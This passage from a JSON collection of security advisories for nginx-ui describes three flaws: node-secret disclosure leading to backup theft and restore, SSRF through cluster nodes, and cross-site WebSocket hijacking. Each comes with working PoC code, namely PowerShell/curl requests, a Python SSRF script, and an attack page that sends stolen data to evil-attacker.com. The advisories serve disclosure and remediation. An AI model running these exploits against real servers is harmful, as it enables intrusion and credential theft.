associates the request with the init user, the same disclosed node.secret can be used to reach the restore workflow, not just read-only or backup routes.\n\nRestoreBackup() accepts:\n\n- backup_file\n- security_token\n- restore_nginx\n- restore_nginx_ui\n- verify_hash\n\nIt parses the security_token as AESKey:AESIv, decodes both values from base64, saves the uploaded backup archive to a temporary location, and then calls the internal restore logic.\n\nIn my local reproduction on v2.3.6, a request to POST /api/restore using only:\n\n- X-Node-Secret\n- a valid backup archive\n- the matching X-Backup-Security token\n\nreturned:\n\n```\n{\"nginx_ui_restored\":false,\"nginx_restored\":false,\"hash_match\":true}\n```\n\nfor a no-op restore test, confirming that the restore path was reachable and processed successfully via the trusted-node authentication path.\n\nI then performed an observable rollback test. After changing node.name to rollback-poc-B, I restored a previously captured backup using only X-Node-Secret plus the matching backup/security token pair. The server returned:\n\n```\n{\"nginx_ui_restored\":true,\"nginx_restored\":false,\"hash_match\":true}\n```\n\nand GET /api/settings/server/name changed from:\n\n```\nrollback-poc-B\n```\n\nback to its original empty value after the restore completed.\n\nThis confirms that the disclosed node.secret is sufficient not only for backup exfiltration, but also for successful restore invocation and rollback of nginx-ui state/configuration.\n\n**Why these files together form the vulnerability**\n\nThese files combine into a single exploitable chain:\n\n- `api/settings/router.go` exposes the settings read endpoint to authenticated callers.\n- `api/settings/settings.go:GetSettings` returns raw settings objects, disclosing node.secret and other sensitive values.\n- `settings/node.go` confirms that node.secret is explicitly treated as a protected field.\n- `internal/middleware/middleware.go:AuthRequired` accepts that same secret as a valid alternate authentication factor and associates the request with the init user.\n\nFor that reason, this is not just a “settings disclosure” issue. It is more accurately described as:\n\n```\nsecret disclosure in a user-facing API combined with reuse of the disclosed secret as an authentication factor in middleware.\n```\n\n### Vulnerable source-to-sink path\n\nThe vulnerable chain spans the settings API, node authentication middleware, backup subsystem, and restore subsystem.\n\n**Source**\n\nAn authenticated caller can reach:\n\n- `GET /api/settings`\n\nThe handler returns raw settings objects directly in the JSON response, including:\n\n- `settings.NodeSettings`\n- `cSettings.AppSettings`\n- `settings.OpenAISettings`\n- other configuration objects\n\nIn my local reproduction on `v2.3.6`, the response exposed:\n\n- `node.secret`\n- `app.jwt_secret`\n\n**Propagation**\n\nThe attacker extracts `node.secret` from the `/api/settings` response and reuses it as:\n\n- `X-Node-Secret` header`, or\n- `node_secret` query parameter`\n\n**Authentication sink**\n\n`AuthRequired()` in `internal/middleware/middleware.go` checks whether the supplied node secret matches `settings.NodeSettings.Secret`. If it matches, the middleware loads `initUser := user.GetInitUser(c)`, stores the user in the request context, and allows the request to proceed without using the ordinary JWT path for that identity flow.\n\n**Post-authentication sinks**\n\nAfter satisfying `AuthRequired()` through `X-Node-Secret`, the attacker can reach additional protected routes, including:\n\n- `GET /api/settings/server/name`\n- `GET /api/settings`\n- `GET /api/backup`\n- `POST /api/restore` (on installed instances via `authIfInstalled` → `AuthRequired()`)`\n\nIn particular:\n\n- `GET /api/backup` returns the backup archive and sets the `X-Backup-Security` response header containing the decryption material (`AESKey:AESIv`)`\n- `POST /api/restore` accepts a backup archive plus the matching `security_token` and executes the restore workflow\n\nThis creates the following end-to-end source-to-sink chain:\n\n1. Authenticated caller reaches `GET /api/settings`\n2. Response discloses `node.secret` (and in my lab also `app.jwt_secret`)\n3. Attacker reuses `node.secret` as `X-Node-Secret`\n4. `AuthRequired()` accepts the request on the trusted-node path and associates it with the init user\n5. Attacker accesses `GET /api/backup`\n6. Server returns the encrypted backup archive and `X-Backup-Security` decryption material in the same response\n7. Attacker submits the captured backup and matching token to `POST /api/restore` using only `X-Node-Secret`\n8. Server processes the restore request successfully\n9. nginx-ui state/configuration can be rolled back to the contents of the captured backup\n\nThis is not just a read-only disclosure chain. It is a disclosure-to-authentication-to-backup-to-restore chain with confirmed integrity impact.\n\n### Why this is a vulnerability, not intended behavior\n\nThis is not expected behavior for three reasons:\n\n1. `Node.Secret` is explicitly marked `protected:\"true\"`, indicating it is sensitive.\n2. `SaveSettings()` uses `ProtectedFill(...)` on NodeSettings, OpenAISettings, and other settings objects, showing the write path already treats these fields as protected/special.\n3. Despite that, GetSettings() still returns the raw secret-bearing objects to the caller, and the disclosed node.secret is immediately reusable as an authentication credential in middleware. That breaks the intended separation between user-facing configuration APIs and internal trusted-node authentication.\n\n### Trust boundary that is broken\n\nThe broken boundary is:\n```\nordinary authenticated user/API session → trusted node / init-user authentication path\n```\n\nA caller who is only supposed to use the normal JWT/cookie-based user path can retrieve a secret that belongs to the trusted-node path, then cross that boundary by presenting `X-Node-Secret` to `AuthRequired()`.\n\n### Attacker model / required privileges\n\nThe confirmed attacker requirement is:\n\n- ability to authenticate to the web UI and call GET /api/settings\n\nIn my local reproduction on v2.3.6, I reproduced this with a normal browser-authenticated session after resetting the initial account password in a fresh Docker deployment. The issue does not require shell access or direct database access. The route itself is protected, but the read-path has no additional redaction for secret-bearing settings, and the disclosed node secret can then be reused as alternate authentication.\n\n### Additional confirmed impact: backup exfiltration through the trusted-node authentication path\n\nThe impact is not limited to reading settings or downloading backups.\n\nIn `api/backup/router.go`, the restore endpoint is exposed as:\n\n```go\nr.POST(\"/restore\", authIfInstalled, middleware.EncryptedForm(), RestoreBackup)\n```\n\nOn installed instances, authIfInstalled calls AuthRequired(). Because AuthRequired() accepts X-Node-Secret and maps the request to the init user when the supplied secret matches settings.NodeSettings.Secret, the disclosed node.secret can also be reused to reach the restore workflow.\n\nIn api/backup/restore.go, RestoreBackup() accepts:\n\n- backup_file\n- security_token\n- restore_nginx\n- restore_nginx_ui\n- verify_hash\n\nIt parses security_token as AESKey:AESIv, decodes both values from base64, saves the uploaded backup archive, and invokes the internal restore logic.\n\nIn my local reproduction on v2.3.6, I first confirmed route reachability by submitting a valid backup archive and matching security_token using only X-Node-Secret, which returned:\n```\n{\"nginx_ui_restored\":false,\"nginx_restored\":false,\"hash_match\":true}\n```\n\nI then performed an observable rollback test:\n\n1. Captured a valid backup in state A\n2. Changed node.name to rollback-poc-B\n3. Verified GET /api/settings/server/name returned rollback-poc-B\n4. Submitted the previously captured backup to POST /api/restore using only X-Node-Secret and the matching security_token\nReceived:\n```\n{\"nginx_ui_restored\":true,\"nginx_restored\":false,\"hash_match\":true}\n```\n\nVerified GET /api/settings/server/name returned the original empty value after restore\n\nThis confirms that the disclosed node.secret is sufficient not only for backup exfiltration, but also for successful restore invocation and rollback of nginx-ui state/configuration through the trusted-node authentication path.\n\n## PoC\n### Reproduction environment\n\n- Product: 0xJacky/nginx-ui\n- Confirmed version: v2.3.6\n- Deployment method: local Docker lab on http://127.0.0.1:8080 using uozi/nginx-ui:latest at the time of testing.\n\n### Exact reproduction steps\n1.Start a fresh local Docker deployment of uozi/nginx-ui:latest.\n\nOptional convenience settings I used in the lab:\n```powershell\nNGINX_UI_NODE_SKIP_INSTALLATION=true\nNGINX_UI_NODE_SECRET=\u003cknown test value\u003e\nNGINX_UI_APP_JWT_SECRET=\u003cknown test value\u003e\nNGINX_UI_IGNORE_DOCKER_SOCKET=true\n```\n\nThese are documented environment settings supported by Nginx UI.\n\n2.Reset the initial account password using the official command:\n```powershell\ndocker exec nginx-ui-lab nginx-ui reset-password --config=/etc/nginx-ui/app.ini\n```\n\nThe application prints the username/password for the initial account.\n[Screenshot 1: password reset output showing the initial username/password]\n\u003cimg width=\"1919\" height=\"274\" alt=\"image\" src=\"https://github.com/user-attachments/assets/ec37a0f1-8de5-42dd-beee-c6ddac458ab8\" /\u003e\n\n3.Log in through the browser and capture the JWT token from the login response or the token cookie.\n[Screenshot 2: browser/devtools showing authenticated session and token]\n\u003cimg width=\"1535\" height=\"746\" alt=\"image\" src=\"https://github.com/user-attachments/assets/012b65a4-fa51-44a2-a8d0-bcb6a733cffa\" /\u003e\n\n4.Send:\n```http\nGET /api/settings\nHeader: Authorization: \u003craw JWT\u003e\n```\n\nIn my reproduction, the response contained:\n\n- `node.secret`\n- `app.jwt_secret`\n- other settings objects such as openai, oidc, casdoor, nginx, etc.\n\nExample PowerShell:\n```powershell\n$Base = \"http://127.0.0.1:8080\"\n$Jwt  = \"\u003ccaptured token\u003e\"\n$authHeaders = @{ Authorization = $Jwt }\n$settings = Invoke-RestMethod -Method Get -Uri \"$Base/api/settings\" -Headers $authHeaders\n$nodeSecret = $settings.node.secret\n$settings | ConvertTo-Json -Depth 20\n```\n\n[Screenshot 3: /api/settings response showing node.secret and app.jwt_secret]\n\u003cimg width=\"1706\" height=\"978\" alt=\"image\" src=\"https://github.com/user-attachments/assets/25fc3c94-e5b3-4309-8b49-09633fbe3b89\" /\u003e\n\n\u003cimg width=\"948\" height=\"104\" alt=\"image\" src=\"https://github.com/user-attachments/assets/eca687a5-1e02-42a1-b196-155184db4226\" /\u003e\n\n\n5.Verify that the protected route fails without authentication:\n```powershell\nInvoke-RestMethod -Method Get -Uri \"$Base/api/settings/server/name\"\n```\n\nExpected result: `403 Forbidden.`\n\n[Screenshot 4: unauthenticated 403]\n\u003cimg width=\"1261\" height=\"236\" alt=\"image\" src=\"https://github.com/user-attachments/assets/ba302b53-e4f7-414a-9a95-ea2b64a5e05a\" /\u003e\n\n6.Re-send the same request with only `X-Node-Secret`:\n```powershell\n$nodeHeaders = @{ \"X-Node-Secret\" = $nodeSecret }\nInvoke-RestMethod -Method Get -Uri \"$Base/api/settings/server/name\" -Headers $nodeHeaders\n```\n\nExpected result: 200 OK with a JSON body such as:\n\n{ \"name\": \"\" }\n\n[Screenshot 5: successful response using only X-Node-Secret]\n\u003cimg width=\"1833\" height=\"96\" alt=\"image\" src=\"https://github.com/user-attachments/assets/eef06152-2450-4701-9b06-6997d7ce24f5\" /\u003e\n\n7.Re-send `GET /api/settings` using only `X-Node-Secret`:\n```powershell\n$settingsViaSecret = Invoke-RestMethod -Method Get -Uri \"$Base/api/settings\" -Headers $nodeHeaders\n$settingsViaSecret | ConvertTo-Json -Depth 20\n```\n\nExpected result: 200 OK, and the response again includes node.secret.\n\n[Screenshot 6: /api/settings succeeding with only X-Node-Secret]\n\u003cimg width=\"1708\" height=\"835\" alt=\"image\" src=\"https://github.com/user-attachments/assets/7401ba0e-fb7e-4de8-970a-39f8077c0748\" /\u003e\n\n\n8.Use the disclosed `node.secret` to access the backup endpoint:\n\n```powershell\n$Base = \"http://127.0.0.1:8080\"\n$nodeHeaders = @{ \"X-Node-Secret\" = $nodeSecret }\n\n$r = Invoke-WebRequest -UseBasicParsing -Method Get -Uri \"$Base/api/backup\" -Headers $nodeHeaders -OutFile \".\\nginxui-backup.zip\" -PassThru\n$r.StatusCode\n$r.Headers[\"X-Backup-Security\"]\n$r.Headers | Format-List\n```\n\nExpected result:\n\n- HTTP status 200 OK\n- a backup archive is written to disk\n- the response contains the X-Backup-Security header with backup decryption material in the format: `AESKey:AESIv`\n\n[Screenshot 7: successful /api/backup download using only X-Node-Secret]\n\u003cimg width=\"1919\" height=\"823\" alt=\"image\" src=\"https://github.com/user-attachments/assets/f76b8e5d-651b-47e0-a08c-7e2dfc6d4a00\" /\u003e\n\n9.(Optional validation) Verify that the issue is not dependent on JWT forgery.\n\nI also tested whether the disclosed app.jwt_secret could be used to forge a valid JWT for standard authenticated routes. I generated a forged HS256 JWT using the leaked signing secret and attempted to access protected endpoints with the forged token.\n\nExample PowerShell:\n```powershell\n$forgedHeaders = @{ Authorization = $ForgedJwt }\n\nInvoke-RestMethod -Method Get -Uri \"$Base/api/settings/server/name\" -Headers $forgedHeaders\nInvoke-RestMethod -Method Get -Uri \"$Base/api/settings\" -Headers $forgedHeaders\nInvoke-WebRequest -UseBasicParsing -Method Get -Uri \"$Base/api/backup\" -Headers $forgedHeaders -OutFile \".\\forged-jwt-backup.zip\" -PassThru\n```\n\nObserved result:\n\n- forged JWT access to /api/settings/server/name returned 403\n- forged JWT access to /api/settings returned 403\n- forged JWT access to /api/backup returned 403\n\nThis suggests the standard JWT path is additionally constrained by server-side token lookup and that the confirmed exploitation path is specifically the disclosed node.secret / X-Node-Secret alternate authentication route.\n\n[Screenshot : forged JWT requests returning 403]\n\n\u003cimg width=\"1907\" height=\"967\" alt=\"image\" src=\"https://github.com/user-attachments/assets/c62a074b-bd35-436a-b1b1-6f2c3bff34d2\" /\u003e\n\n\n10.Confirm observable rollback of nginx-ui state using a previously captured backup.\n\nFirst, I captured a backup in state A:\n```powershell\n$rA = Invoke-WebRequest -UseBasicParsing -Method Get -Uri \"$Base/api/backup\" -Headers $nodeHeaders -OutFile \".\\backup-state-A.zip\" -PassThru\n$SecurityTokenA = ($rA.Headers[\"X-Backup-Security\"] | Select-Object -First 1).ToString().Trim()\n```\n\nI then changed node.name through the normal authenticated settings write path to:\n```\nrollback-poc-B\n```\n\nand verified:\n```\nInvoke-RestMethod -Method Get -Uri \"$Base/api/settings/server/name\" -Headers $nodeHeaders\n```\n\nObserved result:\n```\nname\n----\nrollback-poc-B\n```\n\nI then restored the previously captured state-A backup using only X-Node-Secret and the matching backup/security token:\n```powershell\ncurl.exe -i -X POST \"$Base/api/restore\" `\n  -H \"X-Node-Secret: $nodeSecret\" `\n  -F \"backup_file=@.\\backup-state-A.zip\" `\n  --form-string \"security_token=$SecurityTokenA\" `\n  --form-string \"restore_nginx=false\" `\n  --form-string \"restore_nginx_ui=true\" `\n  --form-string \"verify_hash=true\"\n```\n\nObserved result:\n```powershell\n{\"nginx_ui_restored\":true,\"nginx_restored\":false,\"hash_match\":true}\n```\n\nAfter waiting a few seconds for the restore to apply, I queried the same setting again:\n```powershell\nInvoke-RestMethod -Method Get -Uri \"$Base/api/settings/server/name\" -Headers $nodeHeaders\n```\n\nObserved result:\n```\nname\n----\n```\n\nThis confirmed successful rollback of nginx-ui state/configuration from rollback-poc-B back to the original value using only the disclosed node.secret, a valid backup archive, and the matching X-Backup-Security token.\n\n[Screenshot: node.name / server name before restore showing rollback-poc-B]\n\u003cimg width=\"1517\" height=\"175\" alt=\"image\" src=\"https://github.com/user-attachments/assets/e358a217-3089-45a1-9e66-87f78958a347\" /\u003e\n\n[Screenshot: successful restore response showing nginx_ui_restored:true]\n\u003cimg width=\"1671\" height=\"423\" alt=\"image\" src=\"https://github.com/user-attachments/assets/5051b4c1-0ad7-4186-8158-fb7da593efef\" /\u003e\n\n[Screenshot: same setting after restore showing rollback to the original value]\n\u003cimg width=\"1707\" height=\"319\" alt=\"image\" src=\"https://github.com/user-attachments/assets/eb9b5707-d90a-430e-92f9-6619ddf7f9cd\" /\u003e\n\n### Confirmed observed results\n\nIn my local reproduction on `v2.3.6`:\n\n- `GET /api/settings` with a normal authenticated session returned:\n  - `node.secret = NodeSecret-Lab-123456`\n  - `app.jwt_secret = JwtSecret-Lab-123456`\n\n- `GET /api/settings/server/name` without authentication returned `403`\n\n- `GET /api/settings/server/name` with only `X-Node-Secret: NodeSecret-Lab-123456` returned `200`\n\n- `GET /api/settings` with only `X-Node-Secret` returned `200`\n\n- `GET /api/backup` with only `X-Node-Secret` returned `200`\n\n- `/api/backup` returned both:\n  - a backup archive\n  - the `X-Backup-Security` response header containing backup decryption material\n\n- `POST /api/restore` without authentication failed with:\n```json\n{\"message\":\"Authorization failed\"}\n```\n\nPOST /api/restore with only X-Node-Secret, a valid backup archive, and the matching X-Backup-Security token returned:\n```\n{\"nginx_ui_restored\":false,\"nginx_restored\":false,\"hash_match\":true}\n```\nafter changing node.name to rollback-poc-B, GET /api/settings/server/name returned:\n```\nrollback-poc-B\n```\nrestoring a previously captured backup using only X-Node-Secret and the matching X-Backup-Security token returned:\n```\n{\"nginx_ui_restored\":true,\"nginx_restored\":false,\"hash_match\":true}\n```\nafter restore, GET /api/settings/server/name returned the original empty value, confirming rollback of nginx-ui state/configuration\nforged JWT requests signed with the leaked app.jwt_secret failed with 403 on the tested standard protected routes\n\n## Impact\nThe confirmed impact is:\n\n1. **Sensitive settings disclosure**  \n   An authenticated caller can retrieve sensitive configuration values through `GET /api/settings`, including:\n   - `node.secret`\n   - `app.jwt_secret`\n   - other secret-bearing settings objects depending on deployment and enabled integrations\n\n2. **Alternate-authentication abuse**  \n   The disclosed `node.secret` can be reused through `X-Node-Secret` (or `node_secret`) to satisfy `AuthRequired()` and enter the trusted-node / init-user authentication path.\n\n3. **Trust-boundary bypass**  \n   An ordinary authenticated user can cross from the normal JWT/cookie-based user path into the internal node-authentication path.\n\n4. **Full backup exfiltration**  \n   After crossing that boundary, the attacker can access `GET /api/backup` and download the application's backup archive.\n\n5. **Backup decryption material disclosure**  \n   The same `/api/backup` response also includes the `X-Backup-Security` header containing the decryption material (`AESKey:AESIv`), allowing the attacker to decrypt the exported backup contents.\n\n6. **Restore workflow invocation through the trusted-node path**  \n   The disclosed `node.secret` is sufficient to reach `POST /api/restore` on an installed instance when combined with a valid backup archive and matching `X-Backup-Security` token.\n\n7. **Confirmed rollback of nginx-ui state/configuration**  \n   In my lab, I changed `node.name` to `rollback-poc-B`, then restored a previously captured backup using only `X-Node-Secret` and the matching backup/security token pair. After restore, the value reverted to its original state. This confirms real integrity impact through rollback of nginx-ui state/configuration.\n\n8. **Potential service disruption / operational impact**  \n   Because restore operations can trigger nginx-ui and/or nginx restart behavior depending on the selected restore options, abuse of the restore workflow may also create operational disruption in addition to confidentiality and integrity impact.\n\n9. **Potential downstream compromise**  \n   Depending on deployment and configured integrations, the exposed settings and exported backups may contain additional sensitive information such as:\n   - JWT signing secrets\n   - node secrets\n   - third-party API credentials\n   - OIDC / Casdoor / OpenAI configuration\n   - operational configuration data and other stored secrets\n\n### Notes on JWT forgery testing\n\nI also tested whether the disclosed `app.jwt_secret` could be used for successful forged JWT access on standard authenticated routes. In my reproduction, forged HS256 JWTs signed with the leaked secret were rejected with `403` on `/api/settings/server/name`, `/api/settings`, and `/api/backup`.\n\nThis indicates that the **confirmed exploitation path** is the disclosed `node.secret` and the `X-Node-Secret` trusted-node authentication route, not direct JWT forgery on standard routes.\n\nThis matters because the confirmed impact already includes:\n- backup exfiltration\n- disclosure of backup decryption material\n- successful restore invocation\n- rollback of nginx-ui state/configuration\n\nwithout needing forged JWTs.\n\n## Recommended fix\n1. **Do not return secret-bearing settings fields from `GET /api/settings`.**  \n   Replace the current raw response with a redacted DTO. At minimum, do not expose:\n   - `node.secret`\n   - `app.jwt_secret`\n   - provider / API / client secrets\n   - any other secret-bearing settings fields\n\n2. **Require stronger authorization for settings read operations.**  \n   If `/api/settings` is intended only for trusted administrators or internal operators, enforce that explicitly instead of relying only on the generic authenticated middleware.\n\n3. **Do not use a secret retrievable from a user-facing API as an authentication credential.**  \n   The node secret should be scoped strictly to node-to-node communication and must never be readable through ordinary user-facing settings APIs.\n\n4. **Reassess use of `X-Node-Secret` as a full alternate-authentication mechanism.**  \n   If this mechanism must exist, it should be isolated from user-facing routes and should not map directly to privileged request context without additional scoping or separation.\n\n5. **Protect backup functionality against alternate-authentication abuse.**  \n   `/api/backup` should not be reachable through a secret that can be disclosed via `/api/settings`.\n\n6. **Protect restore functionality against trusted-node secret abuse.**  \n   On installed instances, `/api/restore` should not be invocable through a node secret disclosed from a user-facing API. Restore should require a stronger admin-only authorization model and should not be reachable through the same alternate-authentication path used for node trust.\n\n7. **Do not return backup decryption material in the same response as the backup file.**  \n   The current `X-Backup-Security` header exposes decryption material together with the encrypted archive, which defeats the security goal of backup encryption when the endpoint is reached by an unauthorized actor.\n\n8. **Consider requiring explicit re-authentication / secure-session semantics for restore.**  \n   Restore is a high-impact state-changing action and should be protected at least as strongly as other sensitive write operations.\n\n9. **Rotate compromised secrets on upgrade/fix.**  \n   After patching, rotate:\n   - node secret\n   - JWT signing secret\n   - backup encryption material\n   - any third-party credentials or secrets exposed through `/api/settings` or backup exports\n\n10. **Audit all settings objects returned by `GetSettings()` for secret leakage.**  \n   The current response includes multiple settings objects (`app`, `node`, `openai`, `oidc`, `casdoor`, etc.), so the remediation should be systematic rather than field-by-field only.\n\nA patch is available at https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.8.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-05-05T20:49:45.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N","references":["https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-7jrr-xw9c-mj39","https://nvd.nist.gov/vuln/detail/CVE-2026-42220","https://github.com/0xJacky/nginx-ui/releases/tag/v2.3.8","https://github.com/advisories/GHSA-7jrr-xw9c-mj39"],"source_kind":"github","identifiers":["GHSA-7jrr-xw9c-mj39","CVE-2026-42220"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-05T21:00:09.283Z","updated_at":"2026-10-02T15:03:46.835Z","epss_percentage":0.00397,"epss_percentile":0.31517,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03anJyLXh3OWMtbWozOc4ABWNA","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS03anJyLXh3OWMtbWozOc4ABWNA","packages":[{"ecosystem":"go","package_name":"github.com/0xJacky/Nginx-UI","versions":[{"first_patched_version":null,"vulnerable_version_range":"\u003c= 1.9.9"}],"purl":"pkg:go/github.com%2F0xJacky%2FNginx-UI"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03anJyLXh3OWMtbWozOc4ABWNA/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS13cjMyLTk5aGgtNmYzNc4ABV7X","url":"https://github.com/advisories/GHSA-wr32-99hh-6f35","title":"Nginx-UI has Server-Side Request Forgery (SSRF) via Cluster Proxy Middleware that Allows Access to Internal Services","description":"### Summary\n\nAn authenticated user can perform Server-Side Request Forgery (SSRF) by creating a cluster node pointing to an arbitrary internal URL and then sending API requests with the `X-Node-ID` header. The Proxy middleware forwards these requests to the attacker-specified internal address, bypassing network segmentation and enabling access to services bound to localhost or internal networks.\n\n### Details\n\nThe nginx-ui Proxy middleware (`internal/middleware/proxy.go`) intercepts API requests containing an `X-Node-ID` header and forwards them to the URL of the corresponding cluster node. An attacker can:\n\n1. Read the `node_secret` from `GET /api/settings` (accessible to any authenticated user)\n2. Create a cluster node via `POST /api/nodes` pointing to any internal URL:\n```json\n{\n    \"name\": \"ssrf_node\",\n    \"url\": \"http://127.0.0.1:51820\",\n    \"token\": \"\u003cnode_secret\u003e\",\n    \"enabled\": true\n}\n```\n3. Send any API request with the `X-Node-ID` header set to the created node's ID:\n```\nGET /api/settings HTTP/1.1\nAuthorization: \u003ctoken\u003e\nX-Node-ID: 1\n```\n4. The Proxy middleware forwards this request to `http://127.0.0.1:51820/api/settings`, making a server-side request to the internal address.\n\n**Vulnerable code path:**\n- `internal/middleware/proxy.go` — `Proxy()`: no validation of the node URL; allows `127.0.0.1`, `localhost`, internal IPs, cloud metadata endpoints, etc.\n\nThe node URL is not restricted to external addresses or validated against an allowlist. Combined with the njs Code Injection vulnerability (separate advisory), this SSRF is used to trigger the njs payload executing on an internal-only nginx port, completing the RCE chain.\n\n### PoC\n\n```python\nimport requests\n\nBASE = \"http://TARGET:9000\"\nTOKEN = \"\u003cauthenticated_jwt_token\u003e\"\nHDR = {\"Authorization\": TOKEN}\n\n# Step 1: Get node_secret\nsettings = requests.get(f\"{BASE}/api/settings\", headers=HDR).json()\nnode_secret = settings[\"node\"][\"secret\"]\n\n# Step 2: Create SSRF node pointing to internal service\nresp = requests.post(f\"{BASE}/api/nodes\", headers=HDR, json={\n    \"name\": \"ssrf\",\n    \"url\": \"http://127.0.0.1:51820\",  # internal-only port\n    \"token\": node_secret,\n    \"enabled\": True,\n})\nnode_id = resp.json()[\"id\"]\n\n# Step 3: SSRF — request is forwarded to http://127.0.0.1:51820/api/settings\nresp = requests.get(\n    f\"{BASE}/api/settings\",\n    headers={**HDR, \"X-Node-ID\": str(node_id)},\n)\nprint(resp.status_code, resp.text[:200])\n# Response comes from the INTERNAL service, not nginx-ui\n```\n\nThis can also target cloud metadata endpoints (e.g., `http://169.254.169.254/latest/meta-data/`) or any other internal service.\n\n### Impact\n\nAn authenticated attacker can:\n\n- **Access internal services** bound to localhost or private networks that are not intended to be externally reachable\n- **Access cloud metadata endpoints** (AWS/GCP/Azure instance metadata) to steal IAM credentials\n- **Port-scan internal networks** by creating nodes pointing to different internal IPs/ports\n- **Trigger internal-only njs endpoints** to escalate privileges (as demonstrated in the companion RCE advisory)\n- **Bypass network segmentation** and firewalls that only restrict inbound traffic","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-04-29T20:54:54.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.5,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N","references":["https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-wr32-99hh-6f35","https://nvd.nist.gov/vuln/detail/CVE-2026-44015","https://github.com/advisories/GHSA-wr32-99hh-6f35"],"source_kind":"github","identifiers":["GHSA-wr32-99hh-6f35","CVE-2026-44015"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-04-29T21:00:08.865Z","updated_at":"2026-09-25T12:04:10.414Z","epss_percentage":0.00385,"epss_percentile":0.29761,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS13cjMyLTk5aGgtNmYzNc4ABV7X","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS13cjMyLTk5aGgtNmYzNc4ABV7X","packages":[{"ecosystem":"go","package_name":"github.com/0xJacky/Nginx-UI","versions":[{"first_patched_version":null,"vulnerable_version_range":"\u003c= 2.3.4"}],"purl":"pkg:go/github.com%2F0xJacky%2FNginx-UI"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS13cjMyLTk5aGgtNmYzNc4ABV7X/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS03OG1mLTQ4MnctNjJxas4ABVgn","url":"https://github.com/advisories/GHSA-78mf-482w-62qj","title":"Nginx-UI: Cross-Site WebSocket Hijacking (CSWSH) via missing origin validation on all WebSocket endpoints","description":"## Summary\n\nAll WebSocket endpoints in nginx-ui use a gorilla/websocket Upgrader with CheckOrigin unconditionally returning true, allowing Cross-Site WebSocket Hijacking (CSWSH). Combined with the fact that authentication tokens are stored in browser cookies (set via JavaScript without HttpOnly or explicit SameSite attributes), a malicious webpage can establish authenticated WebSocket connections to the nginx-ui instance when a logged-in administrator visits the attacker-controlled page.\n\n## Details\n\n### Vulnerable Code Pattern\n\nEvery WebSocket endpoint in the codebase uses the same unsafe upgrader configuration:\n\n```go\n// Found in: api/terminal/pty.go, api/analytic/analytic.go, api/event/websocket.go,\n// api/nginx_log/websocket.go, api/upstream/upstream.go, api/cluster/websocket.go,\n// api/nginx/websocket.go, api/certificate/revoke.go, api/sites/websocket.go,\n// api/llm/llm.go, api/llm/code_completion.go, api/system/upgrade.go\nvar upgrader = websocket.Upgrader{\n    CheckOrigin: func(r *http.Request) bool {\n        return true // Accepts ALL origins\n    },\n}\n```\n\n### Cookie-Based Authentication\n\nThe Vue.js frontend stores JWT tokens as cookies without security attributes (app/src/pinia/moudule/user.ts):\n\n```typescript\nwatch(token, v =\u003e {\n    cookies.set('token', v, { maxAge: 86400 })  // No HttpOnly, no SameSite\n})\n```\n\nThe backend middleware accepts tokens from cookies (internal/middleware/middleware.go):\n\n```go\nfunc getToken(c *gin.Context) (token string) {\n    // ...\n    if token, _ = c.Cookie(\"token\"); token != \"\" {\n        return token\n    }\n    return \"\"\n}\n```\n\n### Affected Endpoints\n\nAll WebSocket endpoints under the authenticated router group are vulnerable:\n\n| Endpoint | Impact |\n|---|---|\n| /api/nginx/detail_status/ws | Leak nginx performance metrics and configuration |\n| /api/events | Leak system processing events |\n| /api/analytic/intro | Leak CPU, memory, disk, network statistics |\n| /api/nginx_log | Read nginx log files (access/error logs) |\n| /api/pty | Interactive terminal access (RCE if OTP not enabled) |\n| /api/upgrade/perform | Trigger system binary upgrade |\n| /api/cluster/nodes/enabled | Leak and manipulate cluster node data |\n\n## PoC\n\n### Environment Setup\n\n```yaml\nservices:\n  nginx-ui:\n    image: uozi/nginx-ui:latest\n    ports:\n      - \"9000:80\"\n    volumes:\n      - nginx-ui-config:/etc/nginx-ui\nvolumes:\n  nginx-ui-config:\n```\n\n### Attack Page (hosted on attacker-controlled domain)\n\n```html\n\u003cscript\u003e\n// Attacker page at http://evil-attacker.com\n// Victim must be logged into nginx-ui\nconst ws = new WebSocket('ws://TARGET_NGINX_UI:9000/api/nginx/detail_status/ws');\nws.onopen = () =\u003e console.log('CSWSH: Connected from malicious origin!');\nws.onmessage = (e) =\u003e {\n    console.log('Stolen data:', e.data);\n    fetch('https://evil-attacker.com/collect', {method:'POST', body: e.data});\n};\n\u003c/script\u003e\n```\n\n### Automated PoC Results\n\n```\n[+] VULNERABLE! WebSocket connected from http://evil-attacker.com\n[+] Received: {\"stub_status_enabled\":false,\"running\":true,\"info\":{\"active\":0,...}}\n\n[+] VULNERABLE! Event stream from http://evil-attacker.com\n[+] Received: {\"event\":\"processing_status\",\"data\":{\"index_scanning\":false,...}}\n\n[+] VULNERABLE! Analytics from http://evil-attacker.com\n[+] Received: {\"avg_load\":{\"load1\":0.1,\"load5\":0.2},\"cpu_percent\":0.08,...}\n\n[+] CRITICAL: Terminal connected from http://evil-attacker.com!\n[+] Terminal output: 'eae7a76e3ef4 login: '\n[*] Sent username: root\n[+] Output: 'Password: '\n\n[+] Control test (no auth): Correctly rejected with HTTP 403\n```\n\n## Impact\n\nAn attacker can create a malicious webpage that, when visited by an authenticated nginx-ui administrator, silently:\n\n1. **Steals sensitive server information** -- nginx configuration, performance metrics, CPU/memory/disk usage, network traffic statistics, and system events\n2. **Reads nginx log files** 